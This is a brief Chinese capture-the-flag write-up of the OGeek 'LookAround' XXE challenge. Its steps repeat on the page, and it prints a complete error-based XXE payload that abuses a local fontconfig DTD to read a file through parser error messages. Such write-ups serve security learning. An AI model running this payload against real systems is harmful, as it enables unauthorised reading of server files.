XML中XXE漏洞

OGeek中的LookAround

1.F12查看源码，发现一个js/_.js文件

2.使用burpsuite代理查看，发现是用XML传输数据包，怀疑存在XXE漏洞

3.测试内部回显，没有异常

4.尝试构造DTD，查看异常，缺少filename

5.根据题目提示，需要使用tomcat:8-jre8 ，使用外部DTD声明

6.使用docker去安装，但好像不需要了，巴黎黑客大会给出了一个payload

https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation

<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
<!ENTITY % expr 'aaa)>
<!ENTITY &#x25; file SYSTEM "file:///flag">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>
">
&#x25;eval;
&#x25;error;
<!ELEMENT aa (bb'>
%local_dtd;
]>

7.得到flag

PreviousSpring boot SSTI NextXML和XXE基础

Last updated 6 years ago

Was this helpful?

hashtag1.F12查看源码，发现一个js/_.js文件

hashtag2.使用burpsuite代理查看，发现是用XML传输数据包，怀疑存在XXE漏洞

hashtag3.测试内部回显，没有异常

hashtag4.尝试构造DTD，查看异常，缺少filename

hashtag5.根据题目提示，需要使用tomcat:8-jre8 ，使用外部DTD声明

hashtag6.使用docker去安装，但好像不需要了，巴黎黑客大会给出了一个payload

hashtag7.得到flag

1.F12查看源码，发现一个js/_.js文件

2.使用burpsuite代理查看，发现是用XML传输数据包，怀疑存在XXE漏洞

3.测试内部回显，没有异常

4.尝试构造DTD，查看异常，缺少filename

5.根据题目提示，需要使用tomcat:8-jre8 ，使用外部DTD声明

6.使用docker去安装，但好像不需要了，巴黎黑客大会给出了一个payload

7.得到flag